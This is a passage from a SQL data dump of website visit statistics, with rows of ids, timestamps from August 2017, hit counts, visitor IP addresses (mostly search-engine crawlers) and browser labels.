,0,0,'141.8.183.5','other'),(149577,1503762977,1,1,0,0,'51.255.65.42','other'),(149578,1503763107,1,1,0,0,'217.69.133.221','other'),(149579,1503763165,1,1,0,0,'217.182.132.80','other'),(149580,1503763196,1,1,0,0,'217.182.132.172','other'),(149581,1503763255,1,1,0,0,'157.55.39.90','other'),(149582,1503763271,1,1,0,0,'40.77.167.10','other'),(149583,1503763482,1,1,0,0,'217.182.132.155','other'),(149584,1503763801,1,1,0,0,'217.182.132.6','other'),(149585,1503764121,3,3,0,0,'216.244.66.246','other'),(149586,1503764290,1,1,0,0,'51.255.65.41','other'),(149587,1503764439,1,1,0,0,'213.180.203.32','other'),(149588,1503765046,1,1,0,0,'178.154.200.7','other'),(149589,1503765096,4,4,0,0,'216.244.66.194','other'),(149590,1503765116,1,0,1,0,'66.249.76.107',''),(149591,1503765679,1,1,0,0,'37.9.113.138','other'),(149592,1503766077,1,1,0,0,'8.29.198.26','other'),(149593,1503766171,1,1,0,0,'66.249.66.155','chrome'),(149594,1503766862,1,1,0,0,'217.182.132.14','other'),(149595,1503766890,1,1,0,0,'141.8.183.1','other'),(149596,1503766903,1,1,0,0,'51.255.65.72','other'),(149597,1503767005,1,1,0,0,'216.244.66.246','other'),(149598,1503767167,1,1,0,0,'51.255.65.65','other'),(149599,1503767280,1,1,0,0,'141.8.183.5','other'),(149600,1503768278,1,1,0,0,'217.182.132.178','other'),(149601,1503768320,2,2,0,0,'91.209.11.236','other'),(149602,1503768682,1,1,0,0,'51.255.65.56','other'),(149603,1503769463,1,1,0,0,'217.182.132.86','other'),(149604,1503769510,2,2,0,0,'5.45.207.32','other'),(149605,1503769887,1,0,1,0,'66.249.76.109',''),(149606,1503769951,1,1,0,0,'217.182.132.31','other'),(149607,1503770340,1,1,0,0,'163.172.255.19','chrome'),(149608,1503770359,1,1,0,0,'66.249.76.107','chrome'),(149609,1503770410,2,2,0,0,'91.209.11.236','other'),(149610,1503770448,1,1,0,0,'5.45.207.42','other'),(149611,1503770729,1,1,0,0,'51.255.65.19','other'),(149612,1503771169,1,1,0,0,'51.255.65.8','other'),(149613,1503771423,2,2,0,0,'216.244.66.194','other'),(149614,1503771429,1,0,1,0,'66.249.66.157',''),(149615,1503771722,1,1,0,0,'66.249.66.157','chrome'),(149616,1503771729,1,1,0,0,'216.244.66.237','other'),(149617,1503771805,1,1,0,0,'141.8.183.5','other'),(149618,1503772237,2,2,0,0,'91.209.11.236','other'),(149619,1503772385,1,0,1,0,'66.249.76.89',''),(149620,1503772462,1,1,0,0,'216.244.66.246','other'),(149621,1503772466,1,1,0,0,'37.73.205.140','chrome'),(149622,1503772966,1,1,0,0,'51.255.65.31','other'),(149623,1503773300,1,1,0,0,'51.255.71.129','other'),(149624,1503773402,1,1,0,0,'216.244.66.246','other'),(149625,1503773569,1,1,0,0,'40.77.167.10','other'),(149626,1503773665,1,1,0,0,'40.77.167.109','other'),(149627,1503773935,1,1,0,0,'51.255.65.51','other'),(149628,1503774087,1,1,0,0,'217.182.132.69','other'),(149629,1503774266,1,1,0,0,'5.45.207.32','other'),(149630,1503774415,1,1,0,0,'217.182.132.65','other'),(149631,1503774449,1,0,1,0,'66.249.66.157',''),(149632,1503774505,1,1,0,0,'91.209.11.236','other'),(149633,1503774965,2,0,2,0,'66.249.76.93',''),(149634,1503775107,1,0,1,0,'66.249.66.155',''),(149635,1503775479,1,1,0,0,'95.108.181.63','other'),(149636,1503775563,1,1,0,0,'217.182.132.50','other'),(149637,1503775869,1,1,0,0,'176.31.231.10','other'),(149638,1503776103,1,1,0,0,'37.9.113.138','other'),(149639,1503776218,1,0,1,0,'66.249.66.74',''),(149640,1503776243,1,1,0,0,'151.80.27.118','other'),(149641,1503776665,1,1,0,0,'40.77.167.109','other'),(149642,1503776892,1,1,0,0,'141.8.142.21','other'),(149643,1503776904,1,1,0,0,'91.209.11.236','other'),(149644,1503776907,1,1,0,0,'8.29.198.27','other'),(149645,1503777031,1,1,0,0,'51.255.65.24','other'),(149646,1503777368,1,0,1,0,'66.249.76.107',''),(149647,1503777581,1,1,0,0,'217.182.132.153','other'),(149648,1503777896,1,1,0,0,'95.108.181.63','other'),(149649,1503778456,1,1,0,0,'217.69.133.203','other'),(149650,1503778781,1,1,0,0,'178.251.107.248','chrome'),(149651,1503779185,1,1,0,0,'91.209.11.236','other'),(149652,1503779504,1,1,0,0,'217.182.132.90','other'),(149653,1503780033,1,1,0,0,'51.255.65.76','other'),(149654,1503780195,1,1,0,0,'217.182.132.92','other'),(149655,1503780326,2,2,0,0,'91.209.11.236','other'),(149656,1503780808,1,0,1,0,'66.249.66.156',''),(149657,1503780834,1,1,0,0,'51.255.71.121','other'),(149658,1503781055,1,1,0,0,'185.156.174.88','chrome'),(149659,1503781432,1,1,0,0,'51.255.65.9','other'),(149660,1503781548,1,1,0,0,'91.209.11.236','other'),(149661,1503781661,1,1,0,0,'217.182.132.14','other'),(149662,1503781774,1,1,0,0,'151.80.27.116','other'),(149663,1503781950,1,1,0,0,'66.249.76.91','chrome'),(149664,1503781976,1,1,0,0,'178.62.254.25','chrome'),(149665,1503781994,3,3,0,0,'216.244.66.194','other'),(149666,1503782533,1,1,0,0,'91.196.178.65','chrome'),(149667,1503782736,1,1,0,0,'91.209.11.236','other'),(149668,1503782813,2,2,0,0,'216.244.66.246','other'),(149669,1503783019,1,1,0,0,'217.182.132.23','other'),(149670,1503783437,1,1,0,0,'51.255.71.119','other'),(149671,1503783695,1,0,1,0,'66.249.76.93',''),(149672,1503783968,1,1,0,0,'157.55.39.90','other'),(149673,1503784052,1,1,0,0,'141.8.142.45','other'),(149674,1503784513,1,1,0,0,'217.182.132.66','other'),(149675,1503784581,1,1,0,0,'51.255.65.47','other'),(149676,1503784758,1,1,0,0,'164.132.162.187','other'),(149677,1503785182,1,1,0,0,'207.46.13.28','other'),(149678,1503785540,1,1,0,0,'51.255.65.10','other'),(149679,1503786420,1,1,0,0,'217.182.132.185','other'),(149680,1503786676,3,3,0,0,'216.244.66.194','other'),(149681,1503786697,1,0,1,0,'66.249.76.109',''),(149682,1503786810,5,5,0,0,'216.244.66.246','other'),(149683,1503787538,1,0,1,0,'66.249.66.157',''),(149684,1503787644,1,1,0,0,'137.74.201.100','other'),(149685,1503787733,1,1,0,0,'8.29.198.27','other'),(149686,1503787980,3,3,0,0,'216.244.66.194','other'),(149687,1503788135,1,1,0,0,'51.255.65.72','other'),(149688,1503788362,2,2,0,0,'216.244.66.246','other'),(149689,1503788591,1,1,0,0,'51.255.65.37','other'),(149690,1503790613,1,1,0,0,'5.45.207.64','other'),(149691,1503791082,1,1,0,0,'141.8.142.56','other'),(149692,1503791322,1,1,0,0,'178.154.200.7','other'),(149693,1503791408,1,1,0,0,'217.182.132.91','other'),(149694,1503792583,1,1,0,0,'51.255.65.82','other'),(149695,1503792992,1,1,0,0,'51.255.65.34','other'),(149696,1503793069,1,1,0,0,'5.45.207.64','other'),(149697,1503793165,1,1,0,0,'141.8.183.5','other'),(149698,1503793425,1,1,0,0,'40.77.167.109','other'),(149699,1503793656,1,1,0,0,'180.76.15.19','other'),(149700,1503793909,1,1,0,0,'51.255.65.95','other'),(149701,1503793990,1,1,0,0,'51.255.71.133','other'),(149702,1503794235,1,1,0,0,'217.182.132.4','other'),(149703,1503794362,3,3,0,0,'216.244.66.194','other'),(149704,1503794707,1,0,1,0,'66.249.76.107',''),(149705,1503795465,1,1,0,0,'163.172.255.19','chrome'),(149706,1503795609,1,0,1,0,'66.249.66.74',''),(149707,1503796142,1,1,0,0,'216.244.66.246','other'),(149708,1503797157,1,1,0,0,'217.182.132.153','other'),(149709,1503797214,1,1,0,0,'157.55.39.90','other'),(149710,1503797294,1,0,1,0,'68.180.228.221',''),(149711,1503797725,1,1,0,0,'141.8.142.21','other'),(149712,1503798074,1,1,0,0,'66.249.76.107','chrome'),(149713,1503798165,1,1,0,0,'217.182.132.184','other'),(149714,1503798229,1,1,0,0,'51.255.65.53','other'),(149715,1503798252,1,1,0,0,'213.180.203.32','other'),(149716,1503798545,4,4,0,0,'216.244.66.246','other'),(149717,1503798562,1,1,0,0,'8.29.198.25','other'),(149718,1503798973,1,1,0,0,'164.132.162.158','other'),(149719,1503799303,1,1,0,0,'216.244.66.194','other'),(149720,1503799540,1,1,0,0,'217.182.132.75','other'),(149721,1503801063,1,1,0,0,'51.255.65.67','other'),(149722,1503801134,1,1,0,0,'178.154.200.7','other'),(149723,1503801225,1,1,0,0,'217.182.132.88','other'),(149724,1503801334,1,1,0,0,'51.255.65.23','other'),(149725,1503802628,1,1,0,0,'51.255.64.106','other'),(149726,1503803167,2,2,0,0,'216.244.66.246','other'),(149727,1503803207,1,1,0,0,'164.132.162.158','other'),(149728,1503803209,1,1,0,0,'51.255.65.45','other'),(149729,1503803236,3,3,0,0,'216.244.66.194','other'),(149730,1503803830,1,1,0,0,'217.182.132.50','other'),(149731,1503803891,1,1,0,0,'51.255.65.61','other'),(149732,1503804239,1,1,0,0,'217.182.132.175','other'),(149733,1503804245,1,1,0,0,'217.182.132.14','other'),(149734,1503804338,1,1,0,0,'137.74.207.119','other'),(149735,1503804769,1,1,0,0,'216.244.66.194','other'),(149736,1503806966,3,3,0,0,'216.244.66.246','other'),(149737,1503807394,1,1,0,0,'217.182.132.61','other'),(149738,1503807939,1,0,1,0,'66.249.76.107',''),(149739,1503808000,1,0,1,0,'66.249.66.76',''),(149740,1503808282,1,1,0,0,'216.244.66.194','other'),(149741,1503808896,1,0,1,0,'66.249.76.107',''),(149742,1503809188,1,1,0,0,'95.108.181.69','other'),(149743,1503809370,1,1,0,0,'217.182.132.6','other'),(149744,1503809393,1,1,0,0,'8.29.198.26','other'),(149745,1503809408,1,1,0,0,'137.74.207.114','other'),(149746,1503809689,1,1,0,0,'216.244.66.194','other'),(149747,1503809877,1,1,0,0,'157.55.39.90','other'),(149748,1503810239,2,2,0,0,'216.244.66.246','other'),(149749,1503811175,1,1,0,0,'51.255.65.49','other'),(149750,1503811255,1,1,0,0,'66.249.66.74','chrome'),(149751,1503811479,1,1,0,0,'51.255.71.120','other'),(149752,1503812268,1,1,0,0,'217.69.133.203','other'),(149753,1503812298,1,1,0,0,'217.69.133.4','other'),(149754,1503812642,1,1,0,0,'51.255.65.80','other'),(149755,1503812759,1,1,0,0,'51.255.65.86','other'),(149756,1503813136,1,1,0,0,'185.156.174.88','firefox'),(149757,1503813315,1,1,0,0,'180.76.15.25','other'),(149758,1503813599,4,4,0,0,'216.244.66.194','other'),(149759,1503813604,1,1,0,0,'157.55.39.90','other'),(149760,1503813688,1,1,0,0,'51.255.71.120','other'),(149761,1503814340,1,0,1,0,'66.249.76.108',''),(149762,1503814563,1,1,0,0,'217.69.133.203','other'),(149763,1503814970,1,1,0,0,'217.182.132.148','other'),(149764,1503815279,4,4,0,0,'216.244.66.194','other'),(149765,1503815370,1,1,0,0,'217.182.132.25','other'),(149766,1503815444,1,0,1,0,'66.249.76.108',''),(149767,1503815913,1,1,0,0,'207.46.13.118','other'),(149768,1503816703,1,1,0,0,'51.255.71.125','other'),(149769,1503817019,1,1,0,0,'51.255.65.5','other'),(149770,1503817026,2,0,2,0,'66.249.76.108',''),(149771,1503817774,1,1,0,0,'217.182.132.52','other'),(149772,1503818068,1,1,0,0,'91.196.178.167','chrome'),(149773,1503818276,3,3,0,0,'216.244.66.246','other'),(149774,1503818613,1,0,1,0,'66.249.76.109',''),(149775,1503818646,1,1,0,0,'137.74.207.114','other'),(149776,1503818735,1,1,0,0,'51.255.71.110','other'),(149777,1503819144,1,1,0,0,'217.182.132.173','other'),(149778,1503819393,2,2,0,0,'177.207.238.80','firefox'),(149779,1503819584,1,0,1,0,'66.249.76.108',''),(149780,1503819757,1,1,0,0,'51.255.65.48','other'),(149781,1503819917,1,1,0,0,'217.182.132.28','other'),(149782,1503819977,1,1,0,0,'51.255.71.121','other'),(149783,1503820042,1,1,0,0,'51.255.71.101','other'),(149784,1503820071,37,37,0,0,'88.198.0.163','other'),(149785,1503820072,1,0,1,0,'66.249.66.76',''),(149786,1503820217,1,1,0,0,'8.29.198.27','other'),(149787,1503820346,1,1,0,0,'217.182.132.171','other'),(149788,1503820351,1,1,0,0,'51.255.71.125','other'),(149789,1503820650,2,2,0,0,'216.244.66.246','other'),(149790,1503820922,1,1,0,0,'164.132.162.156','other'),(149791,1503821116,1,0,1,0,'66.249.76.107',''),(149792,1503821289,1,1,0,0,'217.182.132.80','other'),(149793,1503821496,1,1,0,0,'217.182.132.191','other'),(149794,1503821590,1,1,0,0,'51.255.65.62','other'),(149795,1503821686,1,1,0,0,'217.182.132.17','other'),(149796,1503821897,1,1,0,0,'94.178.56.218','chrome'),(149797,1503822532,10,10,0,0,'5.9.111.70','other'),(149798,1503822551,1,1,0,0,'51.255.65.91','other'),(149799,1503822553,1,1,0,0,'66.249.66.156','chrome'),(149800,1503823110,1,1,0,0,'51.255.65.15','other'),(149801,1503823351,1,1,0,0,'51.255.71.110','other'),(149802,1503823734,1,1,0,0,'51.255.65.14','other'),(149803,1503824546,1,1,0,0,'216.244.66.246','other'),(149804,1503824558,1,1,0,0,'164.132.162.155','other'),(149805,1503824609,2,2,0,0,'216.244.66.194','other'),(149806,1503824697,1,1,0,0,'164.132.162.153','other'),(149807,1503825613,1,1,0,0,'37.9.113.163','other'),(149808,1503825916,3,3,0,0,'216.244.66.246','other'),(149809,1503826196,1,1,0,0,'141.8.142.21','other'),(149810,1503826200,1,1,0,0,'141.8.183.5','other'),(149811,1503826263,1,1,0,0,'217.69.133.5','other'),(149812,1503826306,1,1,0,0,'217.69.133.9','other'),(149813,1503826849,1,1,0,0,'51.255.65.31','other'),(149814,1503826876,1,1,0,0,'51.255.65.70','other'),(149815,1503827318,1,1,0,0,'141.8.183.1','other'),(149816,1503827469,1,1,0,0,'217.182.132.29','other'),(149817,1503827494,1,1,0,0,'178.154.200.7','other'),(149818,1503828289,1,1,0,0,'217.182.132.176','other'),(149819,1503828453,1,0,1,0,'66.249.76.89',''),(149820,1503828691,1,0,1,0,'66.249.76.109',''),(149821,1503829287,1,0,1,0,'66.249.76.107',''),(149822,1503829939,1,1,0,0,'217.182.132.191','other'),(149823,1503830082,1,1,0,0,'137.74.203.194','other'),(149824,1503830110,1,1,0,0,'51.255.71.98','other'),(149825,1503831044,1,1,0,0,'8.29.198.27','other'),(149826,1503831367,1,1,0,0,'51.255.71.130','other'),(149827,1503833168,1,1,0,0,'217.182.132.175','other'),(149828,1503833934,1,1,0,0,'137.74.207.114','other'),(149829,1503834138,1,1,0,0,'217.182.132.81','other'),(149830,1503834247,1,1,0,0,'157.55.39.90','other'),(149831,1503834755,1,1,0,0,'162.210.196.100','other'),(149832,1503835369,1,1,0,0,'141.8.142.21','other'),(149833,1503835581,1,1,0,0,'217.182.132.34','other'),(149834,1503835758,3,3,0,0,'91.209.11.236','other'),(149835,1503836040,1,1,0,0,'51.255.65.17','other'),(149836,1503836562,1,1,0,0,'51.255.65.96','other'),(149837,1503838388,1,1,0,0,'91.209.11.236','other'),(149838,1503838559,2,2,0,0,'213.180.203.32','other'),(149839,1503838771,1,1,0,0,'51.255.65.4','other'),(149840,1503838862,1,1,0,0,'217.182.132.50','other'),(149841,1503838871,1,1,0,0,'66.102.9.39','chrome'),(149842,1503839075,1,1,0,0,'91.196.178.129','firefox'),(149843,1503840134,1,1,0,0,'217.182.132.190','other'),(149844,1503840151,1,1,0,0,'51.255.65.80','other'),(149845,1503840772,1,1,0,0,'91.209.11.236','other'),(149846,1503841289,1,1,0,0,'217.182.132.81','other'),(149847,1503841875,1,1,0,0,'8.29.198.27','other'),(149848,1503842181,1,1,0,0,'185.6.8.2','other'),(149849,1503842416,1,1,0,0,'51.255.65.78','other'),(149850,1503842556,1,1,0,0,'51.255.65.21','other'),(149851,1503842776,1,1,0,0,'217.182.132.184','other'),(149852,1503843577,1,1,0,0,'217.69.133.9','other'),(149853,1503844047,1,1,0,0,'91.209.11.236','other'),(149854,1503844099,1,1,0,0,'51.255.65.48','other'),(149855,1503844480,1,1,0,0,'137.74.207.101','other'),(149856,1503844540,1,1,0,0,'217.182.132.75','other'),(149857,1503844977,1,1,0,0,'109.63.161.99','msie'),(149858,1503845042,1,1,0,0,'51.255.65.83','other'),(149859,1503845381,1,1,0,0,'5.45.207.32','other'),(149860,1503845399,1,1,0,0,'217.182.132.32','other'),(149861,1503845509,1,1,0,0,'141.8.183.5','other'),(149862,1503845941,1,1,0,0,'207.46.13.28','other'),(149863,1503846182,1,1,0,0,'178.154.200.7','other'),(149864,1503846267,1,1,0,0,'51.255.65.92','other'),(149865,1503846745,1,1,0,0,'164.132.162.157','other'),(149866,1503846815,1,1,0,0,'91.209.11.236','other'),(149867,1503847033,1,1,0,0,'217.182.132.17','other'),(149868,1503847302,1,1,0,0,'51.255.65.70','other'),(149869,1503847869,1,1,0,0,'164.132.162.164','other'),(149870,1503847952,1,0,1,0,'66.249.76.109',''),(149871,1503848964,1,1,0,0,'54.165.59.7','other'),(149872,1503849325,1,1,0,0,'217.69.133.5','other'),(149873,1503849401,1,1,0,0,'141.8.183.5','other'),(149874,1503849991,1,1,0,0,'213.180.203.32','other'),(149875,1503849995,1,1,0,0,'5.45.207.64','other'),(149876,1503850242,1,1,0,0,'217.182.132.191','other'),(149877,1503850751,1,1,0,0,'51.255.65.39','other'),(149878,1503850846,1,1,0,0,'51.255.65.16','other'),(149879,1503850876,1,1,0,0,'37.9.113.163','other'),(149880,1503850886,1,1,0,0,'51.255.71.113','other'),(149881,1503851507,1,1,0,0,'217.182.132.56','other'),(149882,1503852041,1,1,0,0,'141.8.183.1','other'),(149883,1503852601,1,1,0,0,'217.182.132.32','other'),(149884,1503852705,1,1,0,0,'8.29.198.25','other'),(149885,1503853229,1,1,0,0,'217.182.132.240','other'),(149886,1503853337,1,1,0,0,'178.154.200.7','other'),(149887,1503853657,1,1,0,0,'51.255.71.98','other'),(149888,1503854411,1,1,0,0,'51.255.65.37','other'),(149889,1503855208,1,1,0,0,'217.69.133.5','other'),(149890,1503855550,1,1,0,0,'46.133.210.120','chrome'),(149891,1503855633,1,1,0,0,'217.182.132.64','other'),(149892,1503855942,1,1,0,0,'213.180.203.32','other'),(149893,1503856014,1,1,0,0,'51.255.65.62','other'),(149894,1503856344,1,1,0,0,'51.255.65.61','other'),(149895,1503857296,1,1,0,0,'141.8.142.21','other'),(149896,1503858560,1,1,0,0,'217.69.133.203','other'),(149897,1503858883,1,1,0,0,'217.182.132.16','other'),(149898,1503859170,1,1,0,0,'51.255.71.129','other'),(149899,1503859765,1,1,0,0,'51.255.65.65','other'),(149900,1503859859,1,1,0,0,'217.182.132.68','other'),(149901,1503859875,1,1,0,0,'51.255.65.79','other'),(149902,1503860168,1,1,0,0,'164.132.162.164','other'),(149903,1503860761,1,1,0,0,'141.8.183.1','other'),(149904,1503860801,1,1,0,0,'137.74.207.119','other'),(149905,1503861014,1,1,0,0,'217.69.133.9','other'),(149906,1503861723,1,1,0,0,'51.255.65.69','other'),(149907,1503861985,1,1,0,0,'178.154.200.7','other'),(149908,1503862065,1,1,0,0,'46.161.9.57','msie'),(149909,1503862495,1,1,0,0,'51.255.65.27','other'),(149910,1503862771,1,1,0,0,'51.255.65.37','other'),(149911,1503863017,1,1,0,0,'217.182.132.95','other'),(149912,1503863219,1,1,0,0,'51.255.65.19','other'),(149913,1503863231,1,1,0,0,'51.255.65.60','other'),(149914,1503863424,1,1,0,0,'141.8.183.1','other'),(149915,1503863537,1,1,0,0,'8.29.198.27','other'),(149916,1503863728,1,1,0,0,'51.255.71.118','other'),(149917,1503864647,1,1,0,0,'51.255.65.47','other'),(149918,1503865325,1,1,0,0,'51.255.65.78','other'),(149919,1503865447,1,1,0,0,'51.255.65.31','other'),(149920,1503865945,1,1,0,0,'217.182.132.50','other'),(149921,1503866207,1,1,0,0,'51.255.65.60','other'),(149922,1503866340,1,1,0,0,'107.167.109.51','other'),(149923,1503866460,1,0,1,0,'66.249.66.157',''),(149924,1503866895,1,1,0,0,'141.8.183.5','other'),(149925,1503866911,1,1,0,0,'141.8.142.21','other'),(149926,1503867014,1,1,0,0,'141.8.142.45','other'),(149927,1503867293,1,1,0,0,'217.182.132.178','other'),(149928,1503868173,1,1,0,0,'51.255.65.50','other'),(149929,1503868253,1,1,0,0,'51.255.65.47','other'),(149930,1503868522,1,1,0,0,'178.154.200.7','other'),(149931,1503868589,1,1,0,0,'51.255.65.34','other'),(149932,1503869153,1,1,0,0,'217.182.132.29','other'),(149933,1503869411,1,1,0,0,'217.182.132.75','other'),(149934,1503869413,1,1,0,0,'137.74.203.194','other'),(149935,1503870467,1,1,0,0,'51.255.65.74','other'),(149936,1503870505,1,1,0,0,'157.55.39.90','other'),(149937,1503870633,1,1,0,0,'51.255.71.132','other'),(149938,1503870751,1,1,0,0,'141.8.183.1','other'),(149939,1503870758,1,1,0,0,'217.182.132.241','other'),(149940,1503871294,1,1,0,0,'217.182.132.5','other'),(149941,1503871534,1,1,0,0,'51.255.71.119','other'),(149942,1503871890,1,1,0,0,'51.255.65.66','other'),(149943,1503872687,1,1,0,0,'51.255.65.62','other'),(149944,1503872779,1,1,0,0,'137.74.207.114','other'),(149945,1503873235,1,1,0,0,'217.182.132.23','other'),(149946,1503873278,1,1,0,0,'51.255.65.13','other'),(149947,1503873379,1,1,0,0,'51.255.65.50','other'),(149948,1503873478,1,1,0,0,'116.23.127.150','msie'),(149949,1503873539,1,1,0,0,'217.182.132.63','other'),(149950,1503873726,1,1,0,0,'51.255.65.60','other'),(149951,1503873727,1,1,0,0,'217.182.132.35','other'),(149952,1503873792,1,1,0,0,'46.188.90.210','msie'),(149953,1503873826,12,12,0,0,'158.69.254.103','other'),(149954,1503873872,1,1,0,0,'95.220.223.243','msie'),(149955,1503874038,1,1,0,0,'95.108.181.69','other'),(149956,1503874370,1,1,0,0,'8.29.198.26','other'),(149957,1503874453,1,1,0,0,'217.182.132.88','other'),(149958,1503874457,1,1,0,0,'51.255.65.33','other'),(149959,1503874750,1,1,0,0,'37.9.113.163','other'),(149960,1503876478,1,1,0,0,'217.182.132.85','other'),(149961,1503876901,1,1,0,0,'51.255.71.125','other'),(149962,1503876912,1,1,0,0,'51.255.65.67','other'),(149963,1503877236,1,1,0,0,'51.255.65.55','other'),(149964,1503877850,1,1,0,0,'95.108.181.63','other'),(149965,1503877901,1,1,0,0,'164.132.162.160','other'),(149966,1503878020,1,1,0,0,'178.154.200.7','other'),(149967,1503878321,1,1,0,0,'51.255.65.63','other'),(149968,1503878759,1,0,1,0,'66.249.76.109',''),(149969,1503879064,1,1,0,0,'51.255.65.55','other'),(149970,1503879068,1,1,0,0,'207.46.13.118','other'),(149971,1503879249,1,1,0,0,'95.108.181.69','other'),(149972,1503879427,1,1,0,0,'217.182.132.172','other'),(149973,1503879698,1,1,0,0,'51.255.65.95','other'),(149974,1503880293,1,1,0,0,'178.154.200.7','other'),(149975,1503880432,1,1,0,0,'141.8.183.5','other'),(149976,1503880639,1,1,0,0,'217.182.132.171','other'),(149977,1503881176,1,1,0,0,'5.45.207.32','other'),(149978,1503881434,1,1,0,0,'37.9.113.138','other'),(149979,1503883055,1,1,0,0,'51.255.71.113','other'),(149980,1503883423,1,1,0,0,'51.255.65.82','other'),(149981,1503883498,1,1,0,0,'51.255.65.6','other'),(149982,1503883556,1,1,0,0,'51.255.65.94','other'),(149983,1503883610,1,1,0,0,'51.255.65.23','other'),(149984,1503884285,1,1,0,0,'141.8.142.45','other'),(149985,1503884391,1,1,0,0,'137.74.201.100','other'),(149986,1503885201,1,1,0,0,'8.29.198.27','other'),(149987,1503885642,1,1,0,0,'51.255.65.34','other'),(149988,1503885800,1,1,0,0,'217.182.132.192','other'),(149989,1503886145,1,1,0,0,'51.255.65.85','other'),(149990,1503886338,1,1,0,0,'37.9.113.195','other'),(149991,1503886885,1,1,0,0,'51.255.65.21','other'),(149992,1503887072,1,1,0,0,'180.76.15.15','other'),(149993,1503887107,1,1,0,0,'51.255.65.31','other'),(149994,1503887168,1,1,0,0,'217.182.132.176','other'),(149995,1503887232,1,1,0,0,'81.1.242.33','other'),(149996,1503887635,1,1,0,0,'51.255.65.68','other'),(149997,1503887952,1,1,0,0,'217.182.132.148','other'),(149998,1503888062,1,1,0,0,'5.45.207.64','other'),(149999,1503888512,1,1,0,0,'207.46.13.28','other'),(150000,1503889215,1,0,1,0,'68.180.228.221',''),(150001,1503889298,1,1,0,0,'51.255.65.91','other'),(150002,1503889536,1,1,0,0,'95.108.181.63','other'),(150003,1503889540,1,1,0,0,'37.9.113.163','other'),(150004,1503889747,1,1,0,0,'217.182.132.151','other'),(150005,1503889824,1,1,0,0,'164.132.162.187','other'),(150006,1503889877,1,1,0,0,'217.182.132.63','other'),(150007,1503889931,1,1,0,0,'51.255.71.126','other'),(150008,1503890154,1,1,0,0,'217.182.132.93','other'),(150009,1503890619,1,1,0,0,'217.182.132.156','other'),(150010,1503890715,1,1,0,0,'217.182.132.33','other'),(150011,1503891572,1,1,0,0,'66.249.76.89','chrome'),(150012,1503891970,1,1,0,0,'51.255.65.3','other'),(150013,1503892137,1,1,0,0,'51.255.65.75','other'),(150014,1503892895,1,1,0,0,'95.108.181.63','other'),(150015,1503893346,1,1,0,0,'141.8.142.21','other'),(150016,1503893844,1,1,0,0,'217.182.132.157','other'),(150017,1503893943,1,1,0,0,'217.182.132.66','other'),(150018,1503894099,1,1,0,0,'137.74.203.194','other'),(150019,1503894404,1,1,0,0,'141.8.142.21','other'),(150020,1503895366,1,1,0,0,'217.182.132.67','other'),(150021,1503895448,1,1,0,0,'91.196.178.65','firefox'),(150022,1503895650,1,1,0,0,'217.69.133.6','other'),(150023,1503895734,1,1,0,0,'217.182.132.155','other'),(150024,1503895754,1,1,0,0,'37.9.113.78','other'),(150025,1503896027,1,1,0,0,'8.29.198.25','other'),(150026,1503896755,1,1,0,0,'217.182.132.70','other'),(150027,1503896774,1,1,0,0,'217.182.132.97','other'),(150028,1503897064,1,0,1,0,'68.180.228.221',''),(150029,1503897080,1,1,0,0,'137.74.207.159','other'),(150030,1503897454,2,2,0,0,'95.213.141.126','opera'),(150031,1503897860,1,1,0,0,'141.8.183.1','other'),(150032,1503897865,1,1,0,0,'217.182.132.34','other'),(150033,1503897984,1,1,0,0,'51.255.65.17','other'),(150034,1503897985,1,1,0,0,'217.182.132.37','other'),(150035,1503898804,1,1,0,0,'91.209.11.236','other'),(150036,1503898975,1,1,0,0,'164.132.164.180','other'),(150037,1503899376,1,1,0,0,'217.182.132.51','other'),(150038,1503899514,2,2,0,0,'51.255.65.89','other'),(150039,1503899528,1,1,0,0,'217.182.132.34','other'),(150040,1503899543,1,1,0,0,'51.255.65.76','other'),(150041,1503899899,1,1,0,0,'91.196.178.70','firefox'),(150042,1503900151,1,1,0,0,'151.80.27.116','other'),(150043,1503900722,1,1,0,0,'193.194.158.129','firefox'),(150044,1503900811,1,1,0,0,'141.8.142.45','other'),(150045,1503900997,1,1,0,0,'217.182.132.67','other'),(150046,1503901497,1,1,0,0,'91.196.178.70','firefox'),(150047,1503901601,1,1,0,0,'91.196.178.70','chrome'),(150048,1503901692,1,1,0,0,'91.209.11.236','other'),(150049,1503901825,1,1,0,0,'180.76.15.22','other'),(150050,1503902432,1,1,0,0,'178.154.200.7','other'),(150051,1503902452,1,1,0,0,'91.196.178.129','chrome'),(150052,1503902479,1,1,0,0,'141.8.183.1','other'),(150053,1503902482,1,1,0,0,'37.9.113.78','other'),(150054,1503902483,1,1,0,0,'51.255.65.90','other'),(150055,1503902914,1,1,0,0,'51.255.65.43','other'),(150056,1503903260,1,1,0,0,'46.219.233.196','chrome'),(150057,1503903591,1,1,0,0,'51.255.65.54','other'),(150058,1503904233,1,1,0,0,'217.182.132.173','other'),(150059,1503904814,1,1,0,0,'40.77.167.109','other'),(150060,1503904967,1,1,0,0,'91.196.178.70','chrome'),(150061,1503904997,24,24,0,0,'158.69.251.119','other'),(150062,1503905174,1,1,0,0,'91.196.179.134','chrome'),(150063,1503905209,1,1,0,0,'217.182.132.95','other'),(150064,1503905252,1,1,0,0,'207.46.13.177','other'),(150065,1503905340,1,1,0,0,'193.93.184.171','chrome'),(150066,1503905365,1,1,0,0,'91.209.11.236','other'),(150067,1503905600,1,1,0,0,'92.113.35.182','chrome'),(150068,1503905685,1,1,0,0,'217.182.132.14','other'),(150069,1503906098,1,1,0,0,'51.255.71.115','other'),(150070,1503906225,1,1,0,0,'137.74.207.159','other'),(150071,1503906870,1,1,0,0,'8.29.198.26','other'),(150072,1503906875,1,0,1,0,'66.249.76.108',''),(150073,1503907006,1,1,0,0,'91.209.11.236','other'),(150074,1503907074,1,1,0,0,'217.182.132.147','other'),(150075,1503907087,1,1,0,0,'51.255.71.133','other'),(150076,1503907493,1,1,0,0,'95.135.213.214','firefox'),(150077,1503907689,1,1,0,0,'91.196.178.166','chrome'),(150078,1503907732,1,1,0,0,'91.196.178.70','firefox'),(150079,1503907919,1,1,0,0,'217.182.132.172','other'),(150080,1503908258,1,1,0,0,'92.113.35.182','chrome'),(150081,1503908691,1,1,0,0,'91.196.178.67','chrome'),(150082,1503908974,1,1,0,0,'94.179.42.81','chrome'),(150083,1503909413,1,1,0,0,'51.255.65.3','other'),(150084,1503909420,1,1,0,0,'91.196.177.46','chrome'),(150085,1503909573,1,1,0,0,'91.196.178.65','chrome'),(150086,1503910307,1,1,0,0,'91.209.11.236','other'),(150087,1503910847,1,0,1,0,'66.249.76.89',''),(150088,1503910901,1,1,0,0,'91.196.178.166','chrome'),(150089,1503910925,1,1,0,0,'141.8.183.5','other'),(150090,1503911053,1,1,0,0,'91.196.178.167','firefox'),(150091,1503911121,1,1,0,0,'51.25